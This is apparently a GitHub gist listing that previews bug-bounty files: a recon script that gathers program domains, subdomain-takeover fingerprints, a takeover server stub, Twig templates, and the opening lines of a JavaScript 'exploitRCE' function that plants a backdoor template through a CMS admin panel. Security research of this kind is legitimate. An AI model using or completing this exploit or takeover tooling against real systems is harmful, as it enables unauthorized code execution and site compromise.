0xcrypto
🐢
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env zsh | |
| rm ~/bugbounty -rf | |
| mkdir ~/bugbounty | |
| cd ~/bugbounty | |
| curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json" | |
| cat chaos-bugbounty-list.json | grep '"name"' | awk '{$1=$1};1' | sed 's/"name": "//g' | sed 's/"name":"//g' | sed 's/",//g' | while read folder; do mkdir -p $folder -v; done | |
| for (( i=0; i < $(cat chaos-bugbounty-list.json | jq -r .programs | jq length); i++ )) | |
| do | |
| cat chaos-bugbounty-list.json | jq --arg i "$i" -r ".programs[($i | tonumber)].domains | .[]" > "$(cat chaos-bugbounty-list.json | jq --arg i "$i" -r '.programs[($i | tonumber)].name')/assets.txt" && echo -n "." |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "cicd_pass": true, | |
| "cname": ["us-east-1.elasticbeanstalk.com"], | |
| "discussion": "[Issue #194](https://github.com/EdOverflow/can-i-take-over-xyz/issues/194)", | |
| "documentation": "", | |
| "fingerprint": "NXDOMAIN", | |
| "nxdomain": true, | |
| "service": "AWS/Elastic Beanstalk", | |
| "status": "Vulnerable", |
0xcrypto
/ takeover-server.py
Created
May 11, 2021 11:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json, asyncio, pickle, os | |
| from pathlib import Path | |
| from takeover.takeover import takeover | |
| home = str(Path.home()) | |
| # config is an dictionary. See ~/.config/takeover/config.json for structure | |
| config = json.load(open(home + "/.config/takeover/config.json")) | |
| # Do not forget to replace pointer to fingerprints with the valid data. See ~/.config/takeover/fingerprints.json for structure |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {% macro errorList(errors) %} | |
| {% if errors %} | |
| <ul class="errors"> | |
| {% for error in errors %} | |
| <li>{{ error }}</li> | |
| {% endfor %} | |
| </ul> | |
| {% endif %} | |
| {% endmacro %} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <h1>{{entry.title}}</h1> | |
| {% set rel = entry.asset.one() %} | |
| {% if rel %} | |
| <p><a href="{{ rel.url }}">{{ rel.filename }}</a></p> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
| <script> | |
| // usage: exploitRCE() | |
| function exploitRCE( | |
| adminPanelUrl = '/index.php?p=admin/', | |
| adminPanelDefaultUrl = '/admin/', | |
| backdoor = 'backdoor', | |
| twigTemplateExt = "text/html", |
OlderNewer